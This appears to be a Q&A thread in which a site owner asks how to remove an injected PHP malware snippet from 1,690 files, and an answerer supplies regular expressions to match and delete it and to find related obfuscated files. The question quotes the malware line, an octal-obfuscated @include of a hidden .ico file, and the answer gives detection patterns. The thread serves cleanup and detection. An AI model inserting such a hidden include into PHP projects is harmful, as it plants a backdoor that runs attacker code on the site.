0

I try to find a way to find and replace using EMEditor and a Regular Expression. I try to applu this for the item below:

<?php
/*f04b8*/

@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";

/*f04b8*/ // ini_set(?display_errors?, 1);

I try to replace / erase the code between

<?php

and

// ini_set(?display_errors?, 1);

everything in between is this maleware scipt that I try to get out from many files.

I look for a easy way to delete this in 1690 files. Any idea would be very helpfull.

Best wishes, Thomas

Thom
  • 31
  • 1
  • 3
  • 2
    Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – djdomi Nov 04 '21 at 18:12

1 Answers1

0

The PHP RegExpression for any similar strings would be...

/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/

This can be further simplified but works as is

**Note this will find all occurrences of the offending strings starting with a comment block containing 5 random characters that are not newlines, followed by two new lines, the @include line, 2 more new lines, and the matching block comment closure - regardless of if the document was saved on windows, mac, or linux machines - note \r\n (windows machines) and \n\n (linux & mac machines)

I've verified your string matches at the regex at: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/

Quick Heads-up, to find the malware files containing random string names that contain the obfuscated functions... use the following regex...

/function...\(\$..\){\$...\=."/

This should track down the altered files and find any additional malware files of the same for the malware you're being affected by..

Have a great day! Hopefully this is still useful to someone.

Davidw
  • 1,210
  • 3
  • 14
  • 24
Matthew Combatti
  • 1
  • 1